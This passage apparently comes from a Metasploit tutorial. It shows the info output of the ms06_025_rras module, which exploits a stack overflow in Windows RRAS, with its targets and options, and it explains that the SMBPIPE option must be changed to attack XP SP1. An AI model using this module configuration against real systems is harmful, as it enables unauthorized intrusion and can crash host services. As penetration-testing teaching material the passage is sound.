The Microsoft security bulletin lists XP SP1 as anonymously attackable. Let's take a closer
look at this exploit.
msf exploit(ms06_025_rras) > info

       Name: Microsoft RRAS Service Overflow
    Version: 4498
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License

Provided by:
  Nicolas Pouvesle
  hdm

Available targets:
  Id  Name
  --  ----
  0   Windows 2000 SP4
  1   Windows XP SP1

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.1.220    yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  ROUTER           yes       The pipe name to use (ROUTER, SRVSVC)

Payload information:
  Space: 1104
  Avoid: 1 characters

Description:
  This module exploits a stack overflow in the Windows Routing and
  Remote Access Service. Since the service is hosted inside
  svchost.exe, a failed exploit attempt can cause other system
  services to fail as well. A valid username and password is required
  to exploit this flaw on Windows 2000. When attacking XP SP1, the
  SMBPIPE option needs to be set to 'SRVSVC'.

The exploit description claims that to attack XP SP1, the SMBPIPE option needs to be
set to SRVSVC. You can see from our preceding options display that the SMBPIPE is set
to ROUTER.